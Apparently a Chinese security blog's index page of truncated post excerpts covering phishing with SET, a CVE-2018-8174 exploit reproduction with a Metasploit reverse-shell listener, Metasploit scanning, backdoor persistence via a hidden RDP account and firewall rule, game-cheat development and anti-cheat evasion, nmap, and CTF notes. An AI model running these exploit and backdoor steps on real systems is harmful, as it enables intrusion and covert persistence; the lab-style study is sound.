setoolkit做钓鱼网站
setoolkit是个社工工具
Select from the menu:
Social-Engineering Attacks 社会工程攻击
Penetration Testing (Fast-Track) 渗透测试(快速通道)
Third Party Modules 第三方模块
Update the Social-Engineer Toolkit 更新社会工程师工具包
Update SET configuration 更新set设置
Help, Credits, and About 帮助,积分和关于
Exit the Social-Engineer Toolkit 退出
我们选1
Spear-Phishing Attack Vectors 钓鱼攻击载体
Website Attack Vectors 网站攻击载体
Infectious Media Generator 传染性媒体生成器
Create a Payload and Listener 创建一个有效载荷和听众
Mass Mailer Attack 邮件群发攻击
Arduino-Based Attack ...
CVE-2018-8174 漏洞复现
利用0DAY漏洞CVE-2018-8174获取shellCVE 2018 8174 漏洞影响最新版本的 IE 浏览器及使用了 IE 内核的应用程序。用户在浏览网页或打开 Office 文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在 2 018 年 4 月 20 日早上确认此漏洞,并于 2018 年 5 月 8 号发布了官方安全补丁,对该 0day 漏洞进行了修复,并将其命名为CVE-2018-8174
上传CVE-2018-8174_EXP master.zip
unzip CVE-2018-8174_EXP master.zip
cd
python CVE-2018-8174.py -u http://192.168.3.24/exploit.html -o hack.rtf -i 192.168.3.24 -p 4444
-u url地址 -o生成文档 -i监听地址 -p 监听端口
cp exploit.html /var/www/
启动万能的msf
use exploit/multi/handler
exploit(multi/handler) > set ...
frp内网穿透
1.内网发布服务在公网访问服务器对外发布服务原理内网主机是用一个ip进行上网的,那么如何让互联网其他主机访问我的内网主机呢?
分析NET工作过程可以得知整个过程进行两次ip地址转换。
第一次请求包的源ip地址源地址转化称为SNAT其中S表示source|源 。
第二次转换答应包的目的地址也被称为目的地址转换DNATD表示Destination|目的地,DNAT转换可以使互联网访问到内网的主机,单独配置DNAT就可以实现访问内网主机啦!
通过端口映射发布服务的方式:
端口映射是比较灵活的映射内网各个不同主机的方式,需要对外发布的服务端口,端口映射的配置方式也比较简单,一般情况可通过路由器配置,但是通过路由器配置端口映射需要有一个前提条件,就是你路由器能够拥有一个公网IP,按正常逻辑来说我们路由器拨号成功后运营商会分配一个公网IP给路由器,但是对于运营商来说这样对IPv4的资源也是种负担,如果每个人都有一个公网IP ,那么国内的IPv4资源将会非常紧张,我 国总计约有 3 亿个IPv4地址,而我国网民何止3亿。所以运营商会在路由器拨号中再嵌套一层内网,也就是说我们路由器拨号得到的IP地址也 ...
利用Metasploit信息搜集
信息搜集发现目标网段的存活主机:
我们可以利用auxiliary这个模块来获取目标网端的信息,包括端口开放情况、主机存活情况。
auxiliary/scanner/discovery/arp_sweep
auxiliary/scancer/smb/smb_version 存活的445主机
auxiliary/scanner/portscan/syn 端口扫描
auxiliary/scanner/telnet/telnet_version telent服务扫描
auxiliary/scanner/rdp/rdp_scanner 远程桌面服务扫描
auxiliary/scanner/ssh/ssh_version ssh主机扫描
一般情况下我们在渗透测试的时候,如果在不知道资产的情况下,我们会把整个网端进行扫描存活主机,然后再对存活的信息收集信息,这样的话就可以缩短我们的渗透测试时间,而不盲目的去测试,有时候盲目信息收集会导致后期渗透的道路都是弯的,达不到预期的效果。
不管是端口扫描还是探测存活主机,都是要设置目标IP地址set rhosts ip地址,如果扫描整个网段的话,最后设置 ...
利用Metasploit隐藏后门
1.创建一个新用户来远程连接 win7 桌面RDP概述:远程桌面协议( RDP, Remote Desktop Protocol )是一个多通道 multi channel的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。
1.1使用enable_rdp脚本开启远程桌面并创建用户meterpreter > run post/windows/manage/enable_rdp
meterpreter > run post/windows/manage/enable_rdp USERNAME=phantom PASSWORD=123456
开一个新的终端
root@kali:~# rdesktop 192.168.3.33
登录账号 phantom 123456
1.2.关闭主机防护策略并开启后门通过ms 17 010 永恒之蓝获取到的 shell 可能会出现操作受限的情况,所以我们使用主机的账户信息建立 session 进行连接。
Windows System32 config SAM
我们创建一条防火墙规则允许4444 端口访 ...
游戏安全
游戏外挂1.过保护 TP/NP/BE/GDK/X3
2.数据分析 属性/call/漏洞
3.研发 外挂代码逻辑
4.过检测 模块检测,数据检测,CRC检测,封包检测,堆栈检测,文件检测,特征检测
开发
编程语言,c++/易语言
系统编程 Win32 api PE结构
界面编程 MFC QT 易语言
+-安全技能
软件逆向 数据分析 漏洞挖掘
内核安全 保护模式 调试与异常 驱动研发 VT硬件虚拟化
Metasploit渗透测试框架的基本使用
metasploit 渗透测试框架介绍1.基础库: metasploit 基础库文件位于源码根目录路径下的 libraries 目录中,包括Rex,framework core 和 framework base 三部分。
2.模块:模块组织按照不同的用途分为 6 种类型的模块( Modules分为辅助模块(Aux)、渗透攻击模块( Exploits) 、后渗透攻击模块( Post) 、攻击载荷模块payloads) 、编码器模块( Encoders) 、空指令模块( Nops) 。
3.插件:插件能够扩充框架的功能,或者组装已有功能构成高级特性的组件。插件可以集成现有的一些外部安全工具,如Nessus 、 OpenVAS 漏洞扫描器等,为用户接口提供一些新的功能。
4.接口:包括 msfconsole 控制终端、 msfcli 命令行、 msfgui 图形化界面、 armitage 图形化界面以及 msfapi 远程调用接口。
5.功能程序: metasploit 还提供了一系列可直接运行的功能程序,支持渗透测试者与安全人员快速地利用 metasploit 框架内部能力完成一些特定任务 ...
nmap的使用技巧<1>
nmap参考指南
简单介绍nmapNmap (“Network Mapper(网络映射器)”) 是一款开放源代码的 网络探测和安全审核的工具主机检测工具
检测活在网络上的主机(主机发现)
检测主机上开放的端口(端口发现或枚举)
检测到相应的端口(服务发现)的软件和版本
检测操作系统,硬件地址,以及软件版本
检测脆弱性的漏洞(Nmap的脚本)
命令:**nmap [ <扫描类型> …] [ <选项> ] { <扫描目标说明> }**
#nmap 192.168.3.1 扫描主机 简单扫描 1-1000端口
#nmap 192.168.3.1 扫描整个子网
#nmap 可以执行多个目标
#nmap -sL 192.168.1.1/24如果你想看到你扫描的所有主机的列表
#nmap -p80,21,23 192.168.1.1 扫描端口
nmap端口状态解析open: 应用程序在该端口接收 TCP 连接或者 UDP 报文。 closed :关闭的端口对于nmap也是可访问的, 它接收nmap探测报文并作出响应。但没有应用程序在其上监听。fi ...
Web做题记录1
Web做题记录1[强网杯 2019]高明的黑客import osimport requestsimport reimport threadingimport timeprint('开始时间: '+ time.asctime( time.localtime(time.time()) ))s1=threading.Semaphore(100) #这儿设置最大的线程数filePath = r"D:/soft/phpstudy/PHPTutorial/WWW/src/"os.chdir(filePath) #改变当前的路径requests.adapters.DEFAULT_RETRIES = 5 #设置重连次数,防止线程数过高,断开连接files = os.listdir(filePath)session ...
php魔法函数
魔法函数PHP中把以两个下划线__开头的方法称为魔术方法(Magic methods),这些方法在PHP中充当了举足轻重的作用。 魔术方法包括:
1. __construct() #类的构造函数2. __destruct() #类的析构函数3. __call()#在对象中调用一个不可访问方法时调用4. __callStatic()#用静态方式中调用一个不可访问方法时调用5. __get()#获得一个类的成员变量时调用6. __set()#设置一个类的成员变量时调用7. __isset()#当对不可访问属性调用isset()或empty()时调用8. __unset()#当对不可访问属性调用unset()时被调用。9. __sleep()#执行serialize()时,先会调用这个函数10. __wakeup()#执行unserialize()时,先会调用这个函数11. __toString()#类被当成字符串时的回应方法12. __invoke()#当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。13. __set_state()#调用var_export ...